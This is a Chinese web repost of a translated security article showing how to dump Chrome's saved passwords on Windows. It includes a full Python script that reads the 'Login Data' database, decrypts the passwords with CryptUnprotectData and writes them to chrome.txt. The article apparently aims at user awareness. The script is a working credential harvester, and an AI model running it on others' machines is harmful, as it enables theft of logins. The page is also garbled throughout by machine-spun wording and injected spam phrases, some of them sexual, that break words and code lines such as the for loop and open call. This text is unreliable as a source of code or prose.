首页 欧洲联赛正文

在本文中,我将演示怎么轻松提取Chrome配置文件中保存的用户名和暗码。有人或许会以为Chrome会加密自动保存的暗码,但并非如此。当你在运用Chrome时,往往需求输入某个暗码才干同步自动保存的暗码,书签,设置,阅读器历史记录等。可是,任何人却能在本地直接用12行代码的脚本读取自动保存的明吴金娃文暗码。

演示

需求阐明的是,我暂时没摸女生胸有在macOS或任何Linux体系上进行过测验,一切的测听音阁试都是在Windows的环境中进行,脚本用Python言语编写。

首要,山小桔咱们导入依靠项,然后设置Chrome文件中保存用户数据的文件夹。其间依靠项为:sqlite3和win32crypt

#默许情况下,os和sqlite3已有,需求运用"pip install pypiwin32"来处理win32crypt
import os,sqlite3,win32crypt
#自动获取保存用户数据的默许文件夹
data = os.path.expanduser('~')+r"\AppData\Local\Google\Chrome\User Data\Default\Login Data"

接下来,咱们需求运用s易薪保qlite3衔接到Chrome存丁佩年轻时的相片储用户数据的数据库。首要咱们来希望爱情明丽如初了解一下这传奇,用12行代码提取阅读器自动保存的暗码,前方高能个数据库的结构。经过一个名为SQLite Expert的免费东西,你能够看到如下表结构。

当我检查数据库表时,有三列数据引起了我的留意,分别是acti传奇,用12行代码提取阅读器自动保存的暗码,前方高能on_u薄习rl,username_value和password_value。请留意,password_value列的数据类型是BLOB——这代表它被加密,详细数据如下图所金策工业综合大学示,但这并不是肯定安全的(咱们稍后将说到)。

接下来,咱们将创立一个简略的SQL查询来提取相应的值,并进行解密。

留意:假如你在运转脚本时看到有关数据库被确定的过错,那是由于另传奇,用12行代码提取阅读器自动保存的暗码,前方高能一个程序(很有或许便是Chrome)现已打开了数据库。你需求封闭整个Chrome,确保没有其他Chrome效劳在后台运转。

#衔接数据库
connection = sqlite3.connect(data)
cursor = connection.cursor()
#查询数据
cursor.exe传奇,用12行代码提取阅读器自动保存的暗码,前方高能cute('SELECT action_url, username_value, password_value FROM logins')
final_data = cursor.fetchall()
#封闭数据库衔接
cursor.close()

此刻,咱们得到的被加密的暗码是由Windows函数CryptProtectData生成的。假如要解密,只能由具有相同Windows登录凭据的用户在加密时的核算机上解密。从外部来看,好像没什么问题。

可是,假如黑客现已过木马之类的歹意软件操控了你的核算机,那么下堂王妃值千金黑客此刻能够说现已具有了你的Windows凭据,并且能在你的电脑上进行解密。运用CryptUnprotectData函数,咱们就能够解密被加密的暗码。

#迭代找到的一切值...
for chrome_logins in final_data:
password = win32crypt.CryptUnprotectData(chrome_logins[2], None, None, None, 0)[1]
print("Website : "+str(chrome_logins[0]))
print("Username : "+str(chrome_logins[1]))
print("Password : "+str(password))

就这样,我经过十二行代码,把我从2011开端存储的588个暗码都提取了出来。

其他敏感数据(例如阅读历史记录和Cookie)也能够运用相似办法进行提取。

跋文

关于任何网站来说,单个暗码都不足以确保安全,最好能运用2FA来确保自己的安choucha全。但惋惜的是,现在不少网站都没有2FA功用。

此外,第三方暗码管理器好像也能够处理上述问题,但其自身的安全性仍是不知道,但至少,比任何人都能看到的Chrome的自动保存要好。

当然,我有必要供认,此次提取的暗码让我想起了许多曾经忘掉的暗码,的确处理了我许多问题(乃至触及许多金钱)。

运用代码如下:

# os and sqlite3 ships with Python by default. If you get import errors for win32crypt use "pip install pypiwin32" to install张婉婉 the dependency.
import os, sqlite3, win32crypt
# Automatically get the logged in user's default石豇豆 folder
data = os.path.expanduser('~')+r"\AppData\Local\Google\Chrome\User Data\Default\Login Data"
# Connect to Login Data databa se
connection = sqlite3.connect(data)
cursor = connection.cursor()
# Query the values of interest to us
cursor.execute('SELECT action_url, username_value, password_value传奇,用12行代码提取阅读器自动保存的暗码,前方高能 FROM log冯唐的太太黄山ins')
final_data = cursor.fetchall()
cursor.close()
# print("Found {} pass传奇,用12行代码提取阅读器自动保存的暗码,前方高能words...").format(str(len(final_data)))
write_file=open巴塞塔托("chrome.txt","w")
write_file.write(传奇,用12行代码提取阅读器自动保存的暗码,前方高能"User login data extracted: \n\n")
# Iterating through all the values found...
fo街拍真空r chrome_logins in final_data:
password = win32crypt.CryptUnprotectData(chrome_logins[2], None, None, None, 0)[1]
site = "Website: " + str(chrome_logins[0])
username = "Username: " + str(chrome_logins[1])
password = "Password: " +str(password)
write_file.write(site+"\n"+username+"\n"+password)
write_file.write("\n"+"======"*10+"\n")
print("Saved to chrome.txt")

本文由白帽汇收拾并翻译,不代表达帽汇任何观念和态度

来历:https://nosec.or深圳文斌交易有限公司g/home/detail/2435.html

原文:https://hackernoon.com/why-you-should-never-save-passwords-on-ch内裤相片rome-or-firefox-96b770cfd0d0

白毒医横行帽汇从事信息安全,专心于安全大数据、企业要挟情报。

公司产品:FOFA-网络空间安全搜索引擎、FOEYE-网络空间检索体系、NOSEC-安全消息渠道。

为您供给:网络空间测绘、企业财物搜集、企业要挟情报、应急呼应效劳。

版权声明

本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。